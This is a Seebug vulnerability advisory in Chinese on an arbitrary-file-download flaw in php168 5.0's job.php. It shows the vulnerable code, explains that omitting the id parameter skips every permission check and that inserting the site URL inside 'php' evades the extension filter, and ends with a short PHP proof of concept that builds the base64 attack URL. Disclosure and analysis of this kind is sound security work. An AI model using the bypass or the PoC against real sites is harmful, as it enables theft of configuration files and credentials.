seebugRootSSV:87858

php168 5.0 job.php 信息泄漏漏洞

2009-12-28 00:00:00
Root

漏洞分析

看 job.php 第 92 行：

elseif($job=="download")
{
	// Download handler: loads the article ($id) and its category, runs the
	// admin/group download-permission checks, then streams the file named by
	// the base64-encoded $url request parameter.
	// NOTE(review): $id and $rsdb[fid] are interpolated straight into SQL; a fix
	// should bind them as parameters (or at least cast $id to int).
	$rsdb=$db->get_one("SELECT * FROM {$pre}article WHERE aid='$id'");
	$fidDB=$db->get_one("SELECT * FROM {$pre}sort WHERE fid='$rsdb[fid]'");

	// Every permission check below is keyed on a $fidDB / $rsdb field. When no
	// $id is supplied (or it matches no row) both lookups come back empty, so
	// all three checks are skipped and the download is served with no
	// authorisation at all. A fix should fail closed: reject the request when
	// $rsdb is empty instead of falling through.
	if($fidDB[admin]&&$lfjid){
		$detail=explode(",",$fidDB[admin]);
		if( in_array($lfjid,$detail) ){
			$web_admin=1;
		}
	}

	// Category-level restriction: comma-separated list of group ids allowed
	// to download; admins and the article owner are exempt.
	if($fidDB[allowdownload]&&!$web_admin&&$lfjuid!==$rsdb[uid]){
		$detail=explode(",",$fidDB[allowdownload]);
		if( !in_array($groupdb['gid'],$detail) ){
			showerr("你所在的用户组无权限下载");
		}
	}
	// Article-level restriction, same shape as the category-level one.
	if($rsdb[allowdown]&&!$web_admin&&$lfjuid!==$rsdb[uid]){
		$detail=explode(",",$rsdb[allowdown]);
		if( !in_array($groupdb['gid'],$detail) ){
			showerr("你所在的用户组无权限下载");
		}
	}
	// $url is client-controlled: base64 only encodes it, it does not
	// authenticate it. The ".php" filter runs on the decoded value, but the
	// str_replace right after it rewrites that value, so the string actually
	// used as a path is never checked. (The pattern is also unanchored with an
	// unescaped ".", and eregi() was removed in PHP 7.) A fix should validate
	// $fileurl after all rewriting, canonicalise it with realpath() and require
	// the result to stay inside the intended download directory under
	// PHP168_PATH.
	$url=base64_decode($url);
	if( eregi(".php",$url) ){
		die("ERR");
	}
	$fileurl=str_replace($webdb[www_url],"",$url);
	// Serves any readable file under PHP168_PATH smaller than 500 MB; no
	// normalisation of "../" segments is applied to $fileurl before this point.
	if(is_file(PHP168_PATH."$fileurl")&&filesize(PHP168_PATH."$fileurl")<1024*1024*500){
		$filename=basename($fileurl);
		// File extension is taken from the name, not from the file contents.
		$filetype=substr(strrchr($filename,'.'),1);
		// Stored names of the form <digits>_<200x...>_<segment>.<ext>: the third
		// segment is treated as the base64 of the original name and restored
		// unless the file is an image.
		$_filename=preg_replace("/([\d]+)_(200[\d]+)_([^_]+)\.([^\.]+)/is","\\3",$filename);
		
		if(eregi("^([a-z0-9=]+)$",$_filename)&&!eregi("(jpg|gif|png)$",$filename)){
			$filename=urldecode(base64_decode($_filename)).".$filetype";
		}
		ob_end_clean();
		header('Last-Modified: '.gmdate('D, d M Y H:i:s',time()).' GMT');
		header('Pragma: no-cache');
		header('Content-Encoding: none');
		header('Content-Disposition: attachment; filename='.$filename);
		// Content-Type is derived from the extension string computed above.
		header('Content-type: '.$filetype);
		header('Content-Length: '.filesize(PHP168_PATH."$fileurl"));
		readfile(PHP168_PATH."$fileurl");
	}else{
		// Not a local file: redirect instead. NOTE(review): a decoded $url that
		// contains "://" is passed to Location unchanged — looks like an
		// open-redirect risk; confirm and restrict to an allow-list of hosts.
		$fileurl=strstr($url,"://")?$url:tempdir($fileurl);
		header("location:$fileurl");
	}
	exit;
}

一开始是权限判断。可以发现若不传 id 参数，则 $rsdb 与 $fidDB 均为空，后面依赖它们的权限判断全都不会执行，从而可以越权访问。

然后看 116 行：

$url=base64_decode($url);
if( eregi(".php",$url) ){
die("ERR");
}
$fileurl=str_replace($webdb[www_url],"",$url);

若匹配到了 php 会报错，
但紧跟着的一句代码会把当前网站的网址替换为空。
这样只要在 php 中间插入当前网站的网址，就能绕过这个过滤，达到下载任意文件的目的。
比如 http://test/index.phttp://test.cnhp就可以绕过了

POC

<html>
<body>
<form  method="get">
URL: &lt;input type="text" name="url"&gt;<br>
DIR: &lt;input type="text" name="dir"&gt;<br>
&lt;input type="submit" value="Submit"&gt;<br>

&lt;?php
	$url = $_GET[url];
	$dir = (strlen($_GET[dir])&gt;0)?$_GET[dir]:"/index.php";
	if($url[strlen($url)-1]=='/') 
		$url = substr($url,0,strlen($url)-1);//如果URL的最后一位是/ 则去掉
	if ($dir[0]!='/')
		$dir = '/'.$dir;//如果第一位不是/则加上
	echo "AIM : ".$url."<br />";
	echo "DIR : ".$dir."<br /><br />";
	$t = 0;
	$B64 = $url.$dir;
	while ($r = strpos($B64,"php",$t)){ 
		$B64 = substr($B64,0,$r+1).$url.substr($B64,$r+1);
		$t = $r + 1;
	}
	$B64 = base64_encode($B64);
	$U = $url."/job.php?job=download&url=".$B64;
	echo "<a href>Attack</a>"
    
?&gt;
&lt;/body&gt;
&lt;/html&gt;